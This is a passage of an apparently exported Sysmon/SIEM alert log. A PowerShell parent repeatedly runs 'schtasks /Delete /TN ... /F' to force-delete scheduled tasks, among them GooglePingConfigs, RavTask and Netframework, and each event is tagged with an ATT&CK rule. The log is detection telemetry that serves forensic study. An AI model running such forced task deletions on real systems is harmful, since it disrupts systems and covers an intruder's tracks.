""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.664903100Z"",""eventRecordID"":""3574"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.652\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-0010630b2f00}\r\nProcessId: 6656\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HomeGroupProvider /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.652"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-0010630b2f00}"",""processId"":""6656"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HomeGroupProvider /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.644",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.567 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001011092f00} +ProcessId: 6384 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN GooglePingConfigs /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.573667100Z"",""eventRecordID"":""3573"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.567\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001011092f00}\r\nProcessId: 6384\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN GooglePingConfigs /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.567"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-001011092f00}"",""processId"":""6384"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN GooglePingConfigs /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.643",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.460 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001039072f00} +ProcessId: 7948 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN RavTask /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.486832400Z"",""eventRecordID"":""3572"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.460\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-001039072f00}\r\nProcessId: 7948\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN RavTask /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.460"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-001039072f00}"",""processId"":""7948"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN RavTask /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.585",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.220 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00103f052f00} +ProcessId: 6632 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Flash /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.338231500Z"",""eventRecordID"":""3571"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.220\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00103f052f00}\r\nProcessId: 6632\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Flash /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.220"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-00103f052f00}"",""processId"":""6632"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Flash /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.522",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.188 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-0010ad032f00} +ProcessId: 7608 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Netframework /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.192600900Z"",""eventRecordID"":""3570"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.188\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-0010ad032f00}\r\nProcessId: 7608\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Netframework /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.188"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-0010ad032f00}"",""processId"":""7608"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Netframework /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.469",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.165 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00101e022f00} +ProcessId: 7448 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Miscfost /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:08.167473700Z"",""eventRecordID"":""3569"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:08.165\r\nProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00101e022f00}\r\nProcessId: 7448\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Miscfost /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:08.165"",""processGuid"":""{df9fc3d3-b3f8-5ecf-0000-00101e022f00}"",""processId"":""7448"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Miscfost /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.437",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:08.137 +ProcessGuid: {df9fc3d3-b3f8-5ecf-0000-00107c002f00} +ProcessId: 7396 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN skycmd /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd 